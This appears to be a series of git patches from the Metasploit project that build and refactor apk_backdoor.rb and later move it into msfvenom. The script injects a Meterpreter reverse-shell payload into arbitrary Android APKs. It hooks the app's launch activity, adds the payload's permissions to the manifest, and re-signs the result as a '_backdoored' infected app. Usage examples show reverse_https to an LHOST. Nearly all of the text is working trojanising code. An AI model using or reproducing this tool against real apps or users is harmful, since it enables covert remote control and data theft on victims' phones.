it's not in your PATH, please add it.\n" exit(1) end -apktool = run_cmd("apktool") +apktool = run_cmd("apktool -version") unless(apktool != nil) - puts "[-] APKTool not found. If it's not in your PATH, please add it.\n" + puts "[-] apktool not found. If it's not in your PATH, please add it.\n" exit(1) end -apk_v = apktool -unless(apk_v.split()[1].include?("v2.")) - puts "[-] Apktool version #{apk_v} not supported, please download the latest 2.xx version from git.\n" +apk_v = Gem::Version.new(apktool) +unless(apk_v >= Gem::Version.new('2.0.1')) + puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" exit(1) end From ab4ebe155dd6d7060bd8ff4e617338c9a46824da Mon Sep 17 00:00:00 2001 From: Tim Date: Sun, 27 Sep 2015 12:20:04 +0100 Subject: [PATCH 152/686] placate msftidy --- tools/apk_backdoor.rb | 290 +++++++++++++++++++++--------------------- 1 file changed, 145 insertions(+), 145 deletions(-) diff --git a/tools/apk_backdoor.rb b/tools/apk_backdoor.rb index 1e81f5e885..18401b380d 100755 --- a/tools/apk_backdoor.rb +++ b/tools/apk_backdoor.rb @@ -1,6 +1,6 @@ #!/usr/bin/env ruby # -# This script is a POC for injecting metasploit payloads on +# This script is a POC for injecting metasploit payloads on # arbitrary APKs. # Authored by timwr, Jack64 # @@ -13,36 +13,36 @@ require 'open3' def run_cmd(cmd) - begin - stdin, stdout, stderr = Open3.popen3(cmd) - return stdout.read + stderr.read - rescue Errno::ENOENT - return nil - end + begin + stdin, stdout, stderr = Open3.popen3(cmd) + return stdout.read + stderr.read + rescue Errno::ENOENT + return nil + end end # Find the activity that is opened when you click the app icon def find_launcher_activity(amanifest) - package = amanifest.xpath("//manifest").first['package'] - activities = amanifest.xpath("//activity|//activity-alias") - for activity in activities - activityname = activity.attribute("name") - category = activity.search('category') - unless category - next - end - for cat in category - categoryname = cat.attribute('name') - if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') - activityname = activityname.to_s - unless activityname.start_with?(package) - activityname = package + activityname - end - return activityname - end - end + package = amanifest.xpath("//manifest").first['package'] + activities = amanifest.xpath("//activity|//activity-alias") + for activity in activities + activityname = activity.attribute("name") + category = activity.search('category') + unless category + next end + for cat in category + categoryname = cat.attribute('name') + if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') + activityname = activityname.to_s + unless activityname.start_with?(package) + activityname = package + activityname + end + return activityname + end + end + end end # If XML parsing of the manifest fails, recursively search @@ -50,133 +50,133 @@ end # pick the injection point def scrape_files_for_launcher_activity(tempdir) - smali_files||=[] - Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| - checkFile=File.read(file) - if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") - smali_files << file - smalifile = file - activitysmali = checkFile - end - end - i=0 - print "[*] Please choose from one of the following:\n" - smali_files.each{|s_file| - print "[+] Hook point ",i,": ",s_file,"\n" - i+=1 - } - hook=-1 - while (hook < 0 || hook>i) - print "\nHook: " - hook = STDIN.gets.chomp.to_i - end - i=0 - smalifile="" - activitysmali="" - smali_files.each{|s_file| - if (i==hook) - checkFile=File.read(s_file) - smalifile=s_file - activitysmali = checkFile - break - end - i+=1 - } - return [smalifile,activitysmali] + smali_files||=[] + Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| + checkFile=File.read(file) + if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") + smali_files << file + smalifile = file + activitysmali = checkFile + end + end + i=0 + print "[*] Please choose from one of the following:\n" + smali_files.each{|s_file| + print "[+] Hook point ",i,": ",s_file,"\n" + i+=1 + } + hook=-1 + while (hook < 0 || hook>i) + print "\nHook: " + hook = STDIN.gets.chomp.to_i + end + i=0 + smalifile="" + activitysmali="" + smali_files.each{|s_file| + if (i==hook) + checkFile=File.read(s_file) + smalifile=s_file + activitysmali = checkFile + break + end + i+=1 + } + return [smalifile,activitysmali] end def fix_manifest(tempdir) - payload_permissions=[] + payload_permissions=[] - #Load payload's permissions - File.open("#{tempdir}/payload/AndroidManifest.xml","r"){|file| - k=File.read(file) - payload_manifest=Nokogiri::XML(k) - permissions = payload_manifest.xpath("//manifest/uses-permission") - for permission in permissions - name=permission.attribute("name") - payload_permissions << name.to_s - end - } + #Load payload's permissions + File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file| + k=File.read(file) + payload_manifest=Nokogiri::XML(k) + permissions = payload_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + payload_permissions << name.to_s + end + } - original_permissions=[] - apk_mani="" + original_permissions=[] + apk_mani="" - #Load original apk's permissions - File.open("#{tempdir}/original/AndroidManifest.xml","r"){|file2| - k=File.read(file2) - apk_mani=k - original_manifest=Nokogiri::XML(k) - permissions = original_manifest.xpath("//manifest/uses-permission") - for permission in permissions - name=permission.attribute("name") - original_permissions << name.to_s - end - } + #Load original apk's permissions + File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2| + k=File.read(file2) + apk_mani=k + original_manifest=Nokogiri::XML(k) + permissions = original_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + original_permissions << name.to_s + end + } - #Get permissions that are not in original APK - add_permissions=[] - for permission in payload_permissions - if !(original_permissions.include? permission) - print "[*] Adding #{permission}\n" - add_permissions << permission - end - end + #Get permissions that are not in original APK + add_permissions=[] + for permission in payload_permissions + if !(original_permissions.include? permission) + print "[*] Adding #{permission}\n" + add_permissions << permission + end + end - inject=0 - new_mani="" - #Inject permissions in original APK's manifest - for line in apk_mani.split("\n") - if (line.include? "uses-permission" and inject==0) - for permission in add_permissions - new_mani << ''+"\n" - end - new_mani << line+"\n" - inject=1 - else - new_mani << line+"\n" - end - end - File.open("#{tempdir}/original/AndroidManifest.xml", "w") {|file| file.puts new_mani } + inject=0 + new_mani="" + #Inject permissions in original APK's manifest + for line in apk_mani.split("\n") + if (line.include? "uses-permission" and inject==0) + for permission in add_permissions + new_mani << ''+"\n" + end + new_mani << line+"\n" + inject=1 + else + new_mani << line+"\n" + end + end + File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } end apkfile = ARGV[0] -unless(apkfile && File.readable?(apkfile)) - puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" - exit(1) +unless apkfile && File.readable?(apkfile) + $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + exit(1) end jarsigner = run_cmd("jarsigner") -unless(jarsigner != nil) - puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" - exit(1) +unless jarsigner != nil + $stderr.puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" + exit(1) end apktool = run_cmd("apktool -version") -unless(apktool != nil) - puts "[-] apktool not found. If it's not in your PATH, please add it.\n" - exit(1) +unless apktool != nil + $stderr.puts "[-] apktool not found. If it's not in your PATH, please add it.\n" + exit(1) end apk_v = Gem::Version.new(apktool) -unless(apk_v >= Gem::Version.new('2.0.1')) - puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" - exit(1) +unless apk_v >= Gem::Version.new('2.0.1') + $stderr.puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" + exit(1) end begin - msfvenom_opts = ARGV[1,ARGV.length] - opts="" - msfvenom_opts.each{|x| - opts+=x - opts+=" " - } + msfvenom_opts = ARGV[1,ARGV.length] + opts="" + msfvenom_opts.each{|x| + opts+=x + opts+=" " + } rescue - puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" - puts "[-] Error parsing msfvenom options. Exiting.\n" - exit(1) + $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" + exit(1) end #Create temporary directory where work will be done @@ -185,12 +185,12 @@ tempdir = Dir.mktmpdir print "[*] Generating msfvenom payload..\n" msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "msfvenom")) res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") -if res.downcase.include?("invalid" || "error") - puts res - exit(1) +if res.downcase.include?("error") + $stderr.puts res + exit(1) end -print "[*] Signing payload..\n" +print "[*] Signing payload..\n" run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/payload.apk androiddebugkey") run_cmd("cp #{apkfile} #{tempdir}/original.apk") @@ -199,7 +199,7 @@ print "[*] Decompiling orignal APK..\n" run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") print "[*] Decompiling payload APK..\n" run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") - + f = File.open("#{tempdir}/original/AndroidManifest.xml") amanifest = Nokogiri::XML(f) f.close @@ -209,17 +209,17 @@ print "[*] Locating onCreate() hook..\n" launcheractivity = find_launcher_activity(amanifest) smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" begin - activitysmali = File.read(smalifile) + activitysmali = File.read(smalifile) rescue Errno::ENOENT - print "[!] Unable to find correct hook automatically\n" - begin - results=scrape_files_for_launcher_activity(tempdir) - smalifile=results[0] - activitysmali=results[1] - rescue - puts "[-] Error finding launcher activity. Exiting" - exit(1) - end + print "[!] Unable to find correct hook automatically\n" + begin + results=scrape_files_for_launcher_activity(tempdir) + smalifile=results[0] + activitysmali=results[1] + rescue + $stderr.puts "[-] Error finding launcher activity. Exiting" + exit(1) + end end print "[*] Copying payload files..\n" @@ -229,7 +229,7 @@ activitycreate = ';->onCreate(Landroid/os/Bundle;)V' payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" hookedsmali = activitysmali.gsub(activitycreate, payloadhook) print "[*] Loading ",smalifile," and injecting payload..\n" -File.open(smalifile, "w") {|file| file.puts hookedsmali } +File.open(smalifile, "wb") {|file| file.puts hookedsmali } injected_apk=apkfile.split(".")[0] + "_backdoored.apk" print "[*] Poisoning the manifest with meterpreter permissions..\n" @@ -237,7 +237,7 @@ fix_manifest(tempdir) print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") -print "[*] Signing #{injected_apk} ..\n" +print "[*] Signing #{injected_apk} ..\n" run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") FileUtils.remove_entry tempdir From ad0ff2ea2f9f158deafa3b03ca656b1d5b9e3cb0 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 05:21:13 +0000 Subject: [PATCH 153/686] move to tools/exploit --- tools/{ => exploit}/apk_backdoor.rb | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename tools/{ => exploit}/apk_backdoor.rb (100%) diff --git a/tools/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb similarity index 100% rename from tools/apk_backdoor.rb rename to tools/exploit/apk_backdoor.rb From d1ed363a94a0e93252d1e9c634d5355595935f74 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 06:10:15 +0000 Subject: [PATCH 154/686] clean up apk_backdoor.rb --- tools/exploit/apk_backdoor.rb | 18 ++++++++++-------- 1 file changed, 10 insertions(+), 8 deletions(-) diff --git a/tools/exploit/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb index 18401b380d..c0d461d6d6 100755 --- a/tools/exploit/apk_backdoor.rb +++ b/tools/exploit/apk_backdoor.rb @@ -11,6 +11,10 @@ require 'fileutils' require 'optparse' require 'open3' +def usage + $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" + $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" +end def run_cmd(cmd) begin @@ -142,8 +146,7 @@ end apkfile = ARGV[0] unless apkfile && File.readable?(apkfile) - $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + usage exit(1) end @@ -173,9 +176,8 @@ begin opts+=" " } rescue - $stderr.puts "Usage: #{$0} [target.apk] [msfvenom options]\n" - $stderr.puts "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" + usage exit(1) end @@ -183,7 +185,7 @@ end tempdir = Dir.mktmpdir print "[*] Generating msfvenom payload..\n" -msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "msfvenom")) +msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom")) res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") if res.downcase.include?("error") $stderr.puts res @@ -230,14 +232,14 @@ payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/ hookedsmali = activitysmali.gsub(activitycreate, payloadhook) print "[*] Loading ",smalifile," and injecting payload..\n" File.open(smalifile, "wb") {|file| file.puts hookedsmali } -injected_apk=apkfile.split(".")[0] + "_backdoored.apk" +injected_apk = apkfile.sub('.apk', '_backdoored.apk') print "[*] Poisoning the manifest with meterpreter permissions..\n" fix_manifest(tempdir) -print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}..\n" +print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") -print "[*] Signing #{injected_apk} ..\n" +print "[*] Signing #{injected_apk}\n" run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") FileUtils.remove_entry tempdir From d2cc32a38942c73f03818f6fcf606c6449615bf7 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 14:37:57 +0000 Subject: [PATCH 155/686] integrate apk_backdoor with msfvenom --- lib/msf/core/payload_generator.rb | 11 +- tools/exploit/apk_backdoor.rb | 197 ++++++++++++++++-------------- 2 files changed, 110 insertions(+), 98 deletions(-) diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index b4c436e561..3a209a41dc 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -305,9 +305,14 @@ module Msf # @return [String] A string containing the bytes of the payload in the format selected def generate_payload if platform == "java" or arch == "java" or payload.start_with? "java/" - p = generate_java_payload - cli_print "Payload size: #{p.length} bytes" - p + raw_payload = generate_java_payload + cli_print "Payload size: #{raw_payload.length} bytes" + raw_payload + elsif payload.start_with? "android/" + cli_print "Using template: #{template}" + raw_payload = generate_raw_payload + cli_print "Payload size: #{raw_payload.length} bytes" + raw_payload else raw_payload = generate_raw_payload raw_payload = add_shellcode(raw_payload) diff --git a/tools/exploit/apk_backdoor.rb b/tools/exploit/apk_backdoor.rb index c0d461d6d6..fd6e2ca56d 100755 --- a/tools/exploit/apk_backdoor.rb +++ b/tools/exploit/apk_backdoor.rb @@ -144,105 +144,112 @@ def fix_manifest(tempdir) File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } end -apkfile = ARGV[0] -unless apkfile && File.readable?(apkfile) - usage - exit(1) -end - -jarsigner = run_cmd("jarsigner") -unless jarsigner != nil - $stderr.puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" - exit(1) -end - -apktool = run_cmd("apktool -version") -unless apktool != nil - $stderr.puts "[-] apktool not found. If it's not in your PATH, please add it.\n" - exit(1) -end - -apk_v = Gem::Version.new(apktool) -unless apk_v >= Gem::Version.new('2.0.1') - $stderr.puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" - exit(1) -end - -begin - msfvenom_opts = ARGV[1,ARGV.length] - opts="" - msfvenom_opts.each{|x| - opts+=x - opts+=" " - } -rescue - $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" - usage - exit(1) -end - -#Create temporary directory where work will be done -tempdir = Dir.mktmpdir - -print "[*] Generating msfvenom payload..\n" -msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom")) -res = run_cmd("#{msfvenom_path} -f raw #{opts} -o #{tempdir}/payload.apk 2>&1") -if res.downcase.include?("error") - $stderr.puts res - exit(1) -end - -print "[*] Signing payload..\n" -run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{tempdir}/payload.apk androiddebugkey") - -run_cmd("cp #{apkfile} #{tempdir}/original.apk") - -print "[*] Decompiling orignal APK..\n" -run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") -print "[*] Decompiling payload APK..\n" -run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") - -f = File.open("#{tempdir}/original/AndroidManifest.xml") -amanifest = Nokogiri::XML(f) -f.close - -print "[*] Locating onCreate() hook..\n" - -launcheractivity = find_launcher_activity(amanifest) -smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" -begin - activitysmali = File.read(smalifile) -rescue Errno::ENOENT - print "[!] Unable to find correct hook automatically\n" - begin - results=scrape_files_for_launcher_activity(tempdir) - smalifile=results[0] - activitysmali=results[1] - rescue - $stderr.puts "[-] Error finding launcher activity. Exiting" +def backdoor_payload(apkfile, raw_payload) + unless apkfile && File.readable?(apkfile) + usage exit(1) end + + jarsigner = run_cmd("jarsigner") + unless jarsigner != nil + $stderr.puts "[-] jarsigner not found. If it's not in your PATH, please add it.\n" + exit(1) + end + + apktool = run_cmd("apktool -version") + unless apktool != nil + $stderr.puts "[-] apktool not found. If it's not in your PATH, please add it.\n" + exit(1) + end + + apk_v = Gem::Version.new(apktool) + unless apk_v >= Gem::Version.new('2.0.1') + $stderr.puts "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" + exit(1) + end + + #Create temporary directory where work will be done + tempdir = Dir.mktmpdir + + File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } + FileUtils.cp apkfile, "#{tempdir}/original.apk" + + print "[*] Decompiling original APK..\n" + run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") + print "[*] Decompiling payload APK..\n" + run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") + + f = File.open("#{tempdir}/original/AndroidManifest.xml") + amanifest = Nokogiri::XML(f) + f.close + + print "[*] Locating onCreate() hook..\n" + + launcheractivity = find_launcher_activity(amanifest) + smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" + begin + activitysmali = File.read(smalifile) + rescue Errno::ENOENT + print "[!] Unable to find correct hook automatically\n" + begin + results=scrape_files_for_launcher_activity(tempdir) + smalifile=results[0] + activitysmali=results[1] + rescue + $stderr.puts "[-] Error finding launcher activity. Exiting" + exit(1) + end + end + + print "[*] Copying payload files..\n" + FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") + FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" + activitycreate = ';->onCreate(Landroid/os/Bundle;)V' + payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" + hookedsmali = activitysmali.gsub(activitycreate, payloadhook) + print "[*] Loading ",smalifile," and injecting payload..\n" + File.open(smalifile, "wb") {|file| file.puts hookedsmali } + injected_apk = apkfile.sub('.apk', '_backdoored.apk') + + print "[*] Poisoning the manifest with meterpreter permissions..\n" + fix_manifest(tempdir) + + print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" + run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") + print "[*] Signing #{injected_apk}\n" + run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") + + FileUtils.remove_entry tempdir + + puts "[+] Infected file #{injected_apk} ready.\n" end -print "[*] Copying payload files..\n" -FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") -FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" -activitycreate = ';->onCreate(Landroid/os/Bundle;)V' -payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" -hookedsmali = activitysmali.gsub(activitycreate, payloadhook) -print "[*] Loading ",smalifile," and injecting payload..\n" -File.open(smalifile, "wb") {|file| file.puts hookedsmali } -injected_apk = apkfile.sub('.apk', '_backdoored.apk') +if __FILE__ == $0 + begin + msfvenom_opts = ARGV[1,ARGV.length] + opts="" + msfvenom_opts.each{|x| + opts+=x + opts+=" " + } + rescue + $stderr.puts "[-] Error parsing msfvenom options. Exiting.\n" + usage + exit(1) + end -print "[*] Poisoning the manifest with meterpreter permissions..\n" -fix_manifest(tempdir) + print "[*] Generating msfvenom payload..\n" + msfvenom_path = File.expand_path(File.join(File.dirname(__FILE__), "..", "..", "msfvenom")) + msfvenom_command = "#{msfvenom_path} -f raw #{opts}" + begin + stdin, stdout, stderr = Open3.popen3(msfvenom_command) + payload = stdout.read + msfvenom_output = stderr.read + backdoor_payload(ARGV[0], payload) + rescue Errno::ENOENT + $stderr.puts msfvenom_output + exit(1) + end -print "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" -run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") -print "[*] Signing #{injected_apk}\n" -run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") - -FileUtils.remove_entry tempdir - -puts "[+] Infected file #{injected_apk} ready.\n" +end From 662a6dfd53f0c3d72dbec3b21cee0e1211ff2d8a Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 14:47:55 +0000 Subject: [PATCH 156/686] =?UTF-8?q?=C2=AF\=5F(=E3=83=84)=5F/=C2=AF?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- lib/msf/core/payload/apk.rb | 225 ++++++++++++++++++++++++++++++ lib/msf/core/payload_generator.rb | 2 + 2 files changed, 227 insertions(+) create mode 100644 lib/msf/core/payload/apk.rb diff --git a/lib/msf/core/payload/apk.rb b/lib/msf/core/payload/apk.rb new file mode 100644 index 0000000000..bdfdb4421d --- /dev/null +++ b/lib/msf/core/payload/apk.rb @@ -0,0 +1,225 @@ +# -*- coding: binary -*- + +require 'msf/core' +require 'tmpdir' +require 'nokogiri' +require 'fileutils' +require 'optparse' +require 'open3' + +module Msf::Payload::Apk + + def usage + print_error "Usage: #{$0} [target.apk] [msfvenom options]\n" + print_error "e.g. #{$0} messenger.apk -p android/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=8443\n" + end + + def run_cmd(cmd) + begin + stdin, stdout, stderr = Open3.popen3(cmd) + return stdout.read + stderr.read + rescue Errno::ENOENT + return nil + end + end + + # Find the activity that is opened when you click the app icon + def find_launcher_activity(amanifest) + package = amanifest.xpath("//manifest").first['package'] + activities = amanifest.xpath("//activity|//activity-alias") + for activity in activities + activityname = activity.attribute("name") + category = activity.search('category') + unless category + next + end + for cat in category + categoryname = cat.attribute('name') + if (categoryname.to_s == 'android.intent.category.LAUNCHER' || categoryname.to_s == 'android.intent.action.MAIN') + activityname = activityname.to_s + unless activityname.start_with?(package) + activityname = package + activityname + end + return activityname + end + end + end + end + + # If XML parsing of the manifest fails, recursively search + # the smali code for the onCreate() hook and let the user + # pick the injection point + + def scrape_files_for_launcher_activity(tempdir) + smali_files||=[] + Dir.glob("#{tempdir}/original/smali*/**/*.smali") do |file| + checkFile=File.read(file) + if (checkFile.include?";->onCreate(Landroid/os/Bundle;)V") + smali_files << file + smalifile = file + activitysmali = checkFile + end + end + i=0 + print_status "[*] Please choose from one of the following:\n" + smali_files.each{|s_file| + print_status "[+] Hook point ",i,": ",s_file,"\n" + i+=1 + } + hook=-1 + while (hook < 0 || hook>i) + print_status "\nHook: " + hook = STDIN.gets.chomp.to_i + end + i=0 + smalifile="" + activitysmali="" + smali_files.each{|s_file| + if (i==hook) + checkFile=File.read(s_file) + smalifile=s_file + activitysmali = checkFile + break + end + i+=1 + } + return [smalifile,activitysmali] + end + + def fix_manifest(tempdir) + payload_permissions=[] + + #Load payload's permissions + File.open("#{tempdir}/payload/AndroidManifest.xml","rb"){|file| + k=File.read(file) + payload_manifest=Nokogiri::XML(k) + permissions = payload_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + payload_permissions << name.to_s + end + } + + original_permissions=[] + apk_mani="" + + #Load original apk's permissions + File.open("#{tempdir}/original/AndroidManifest.xml","rb"){|file2| + k=File.read(file2) + apk_mani=k + original_manifest=Nokogiri::XML(k) + permissions = original_manifest.xpath("//manifest/uses-permission") + for permission in permissions + name=permission.attribute("name") + original_permissions << name.to_s + end + } + + #Get permissions that are not in original APK + add_permissions=[] + for permission in payload_permissions + if !(original_permissions.include? permission) + print_status "[*] Adding #{permission}\n" + add_permissions << permission + end + end + + inject=0 + new_mani="" + #Inject permissions in original APK's manifest + for line in apk_mani.split("\n") + if (line.include? "uses-permission" and inject==0) + for permission in add_permissions + new_mani << ''+"\n" + end + new_mani << line+"\n" + inject=1 + else + new_mani << line+"\n" + end + end + File.open("#{tempdir}/original/AndroidManifest.xml", "wb") {|file| file.puts new_mani } + end + + def backdoor_payload(apkfile, raw_payload) + unless apkfile && File.readable?(apkfile) + usage + exit(1) + end + + jarsigner = run_cmd("jarsigner") + unless jarsigner != nil + print_error "[-] jarsigner not found. If it's not in your PATH, please add it.\n" + exit(1) + end + + apktool = run_cmd("apktool -version") + unless apktool != nil + print_error "[-] apktool not found. If it's not in your PATH, please add it.\n" + exit(1) + end + + apk_v = Gem::Version.new(apktool) + unless apk_v >= Gem::Version.new('2.0.1') + print_error "[-] apktool version #{apk_v} not supported, please download at least version 2.0.1.\n" + exit(1) + end + + #Create temporary directory where work will be done + tempdir = Dir.mktmpdir + + File.open("#{tempdir}/payload.apk", "wb") {|file| file.puts raw_payload } + FileUtils.cp apkfile, "#{tempdir}/original.apk" + + print_status "[*] Decompiling original APK..\n" + run_cmd("apktool d #{tempdir}/original.apk -o #{tempdir}/original") + print_status "[*] Decompiling payload APK..\n" + run_cmd("apktool d #{tempdir}/payload.apk -o #{tempdir}/payload") + + f = File.open("#{tempdir}/original/AndroidManifest.xml") + amanifest = Nokogiri::XML(f) + f.close + + print_status "[*] Locating onCreate() hook..\n" + + launcheractivity = find_launcher_activity(amanifest) + smalifile = "#{tempdir}/original/smali/" + launcheractivity.gsub(/\./, "/") + ".smali" + begin + activitysmali = File.read(smalifile) + rescue Errno::ENOENT + print_status "[!] Unable to find correct hook automatically\n" + begin + results=scrape_files_for_launcher_activity(tempdir) + smalifile=results[0] + activitysmali=results[1] + rescue + print_error "[-] Error finding launcher activity. Exiting" + exit(1) + end + end + + print_status "[*] Copying payload files..\n" + FileUtils.mkdir_p("#{tempdir}/original/smali/com/metasploit/stage/") + FileUtils.cp Dir.glob("#{tempdir}/payload/smali/com/metasploit/stage/Payload*.smali"), "#{tempdir}/original/smali/com/metasploit/stage/" + activitycreate = ';->onCreate(Landroid/os/Bundle;)V' + payloadhook = activitycreate + "\n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V" + hookedsmali = activitysmali.gsub(activitycreate, payloadhook) + print_status "[*] Loading ",smalifile," and injecting payload..\n" + File.open(smalifile, "wb") {|file| file.puts hookedsmali } + injected_apk = apkfile.sub('.apk', '_backdoored.apk') + + print_status "[*] Poisoning the manifest with meterpreter permissions..\n" + fix_manifest(tempdir) + + print_status "[*] Rebuilding #{apkfile} with meterpreter injection as #{injected_apk}\n" + run_cmd("apktool b -o #{injected_apk} #{tempdir}/original") + print_status "[*] Signing #{injected_apk}\n" + run_cmd("jarsigner -verbose -keystore ~/.android/debug.keystore -storepass android -keypass android -digestalg SHA1 -sigalg MD5withRSA #{injected_apk} androiddebugkey") + + FileUtils.remove_entry tempdir + + puts "[+] Infected file #{injected_apk} ready.\n" + end +end + + diff --git a/lib/msf/core/payload_generator.rb b/lib/msf/core/payload_generator.rb index 3a209a41dc..b051bbc97e 100644 --- a/lib/msf/core/payload_generator.rb +++ b/lib/msf/core/payload_generator.rb @@ -1,4 +1,5 @@ # -*- coding: binary -*- +require 'msf/core/payload/apk' require 'active_support/core_ext/numeric/bytes' module Msf @@ -310,6 +311,7 @@ module Msf raw_payload elsif payload.start_with? "android/" cli_print "Using template: #{template}" + raw_payload = generate_raw_payload cli_print "Payload size: #{raw_payload.length} bytes" raw_payload From eeea4bde9d68256b092e643caa3ed83538495ff3 Mon Sep 17 00:00:00 2001 From: Tim Date: Tue, 22 Dec 2015 15:58:27 +0000 Subject: [PATCH 157/686] integrate ./msfvenom -x for android payloads --- lib/msf/core/payload/apk.rb | 98 ++++-------- lib/msf/core/payload_generator.rb | 6 